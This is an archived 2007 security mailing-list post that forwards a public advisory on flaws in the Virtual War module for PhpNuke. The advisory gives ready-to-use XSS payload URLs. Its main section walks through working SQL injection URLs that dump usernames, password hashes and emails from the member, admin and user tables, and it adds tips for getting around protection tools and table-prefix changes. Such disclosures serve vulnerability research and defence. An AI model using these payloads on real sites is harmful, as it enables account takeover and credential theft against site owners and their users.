[VIM] DUP?: [waraxe-2007-SA#048] - Multiple vulnerabilities in Virtual War 1.5 module for PhpNuke

str0ke str0ke at milw0rm.com
Fri Apr 13 18:02:42 UTC 2007


It seems brOmstar discovered the sql injection vulnerability in mid-2006.

http://www.milw0rm.com/exploits/2170

/str0ke

---------- Forwarded message ----------
From: come2waraxe at yahoo.com <come2waraxe at yahoo.com>
Date: 13 Apr 2007 16:01:13 -0000
Subject: [waraxe-2007-SA#048] - Multiple vulnerabilities in Virtual
War 1.5 module for PhpNuke
To: bugtraq at securityfocus.com




[waraxe-2007-SA#048] - Multiple vulnerabilities in Virtual War 1.5
module for PhpNuke


Author: Janek Vind "waraxe"
Date: 13. April 2007
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-48.html


Target software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

VWar module for PhpNuke

http://www.vwar.de/

VWar is a webbased matchorganizing system for online gamers.
The complete output is realised by PHP with MySQL as database backend.
The system is divided into 2 parts, the public area and the admin area.

VWar 1.5.0 R15 is out.
Changes:
fixed: mysql injection bug in extra/ files

// I guess, they have not fixed all the bugs yet :) //

Affected are Virtual War versions 1.5 R15 and below


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Found security bugs: one critical sql injection and two XSS bugs.
There are probably more vulnerabilities, had no time for deeper analyze ...


1. XSS in "/modules/vwar/extra/today.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.target.com/modules/vwar/extra/today.php?whattoshow=3&title=kala<script>alert(document.cookie);</script>

Problem is caused by uninitialized variable "$title". Successful
exploitation requires that "register_globals" is "on"
in php settings.


2. XSS in "/modules/vwar/extra/login.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.target.com/modules/vwar/extra/login.php?memberlist=</select></form><script>alert(document.cookie);</script>

Similar to previous case this XSS is caused by uninitialized variable,
in this time "$memberlist".
Successful exploitation requires that "register_globals" is "on" in
php settings.


3. Critical sql injection bug in many VWar scripts
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Personally, I like uninitialized variables in php source code. They
are giving so much cool possibilities to
everyone, who is searching for secutity holes. And this serious sql
injection case has his roots in same problem.

Let's look @ "/modules/vwar/extra/online.php" line 63:

----------------[ from source code ]------------------
$query = $vwardb->query("
        SELECT memberid, name, lastactivity
        FROM vwar".$n."_member WHERE lastactivity > ".(time() -
$onlinetime * 60)."
");
----------------[ /from source code ]-----------------

And by the way - "$n" variable is not initialized! So what happens, if
we issue this query:

http://www.victim.com/modules/vwar/extra/online.php?n=waraxe

Oops... We got error message:


-> Database Error: Invalid SQL:
        SELECT memberid, name, lastactivity
        FROM vwarwaraxe_member WHERE lastactivity > 1176476015

-> MySQL Error: Table 'victimdb.vwarwaraxe_member' doesn't exist
-> MySQL Error Number: 1146
-> Date: 11.04.2007 @ 18:03
-> Script: /modules/vwar/extra/online.php?n=waraxe
-> Referer:

Now, can we exploit this sql injection? Let's try next move:

http://www.victim.com/modules/vwar/extra/online.php?n=_member+WHERE+0+UNION+ALL+SELECT+1,@@version,3/*

4.1.22

It works!! Now it's time for more serious fun:

[[[[[ kidd0z - attentione ]]]]]

http://www.victim.com/modules/vwar/extra/online.php?n=_member+WHERE+0+
UNION+ALL+SELECT+1,CONCAT(name,CHAR(94),password,CHAR(94),email),3+FROM+vwar_member/*

... and we get all vwar member usernames, password double-md5 hashes and emails

http://www.victim.com/modules/vwar/extra/online.php?n=_member+WHERE+0+
UNION+ALL+SELECT+1,CONCAT(aid,CHAR(94),pwd,CHAR(94),email),3+FROM+nuke_authors/*

... and we have all the nuke admin usernames, md5 hashes and emails

http://www.victim.com/modules/vwar/extra/online.php?n=_member+WHERE+0+
UNION+ALL+SELECT+1,CONCAT(username,CHAR(94),user_password,CHAR(94),user_email),3+FROM+nuke_users/*

... and finally, all the nuke user credentials in one big listing :)

Remarks:

R01 - Sentinel, Protector and other powerful phpnuke protection
systems - they will not work
against this exploits. Because we are not entering from front door,
but will use rear window :)

R02 - "register_globals" must be "on" for exploits to work

R03 - phpnuke table prefix can be changed from default, in this case -
no nuke user and admin data!

R04 - there can be need for playing with "$n" value. Because vwar
module installer can assaign different
values besides empty value. So if default exploit will not work, then
this can be tried:

/online.php?n=0_member+WHERE
/online.php?n=1_member+WHERE
/online.php?n=2_member+WHERE

... and so on.
And because we have perfect sql error feedback, then it is easy to
overcome various exploiting problems.

R05 - many other scripts in "extra" directory have same sql injection
vulnerability!


See ya soon and have a nice day ;)


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to LINUX, Heintz, slimjim100, shai-tan, y3dips and all
other people who know me!

Special greets goes to Raido Kerna.

Tervitusi Torufoorumi rahvale!


Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe at yahoo.com
Janek Vind "waraxe"

Homepage: http://www.waraxe.us/


Shameless advertise:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

DX expedition database - http://www.dxdb.com/
Amateur Radio Database - http://www.hamdb.com/

---------------------------------- [ EOF ] ------------------------------------


More information about the VIM mailing list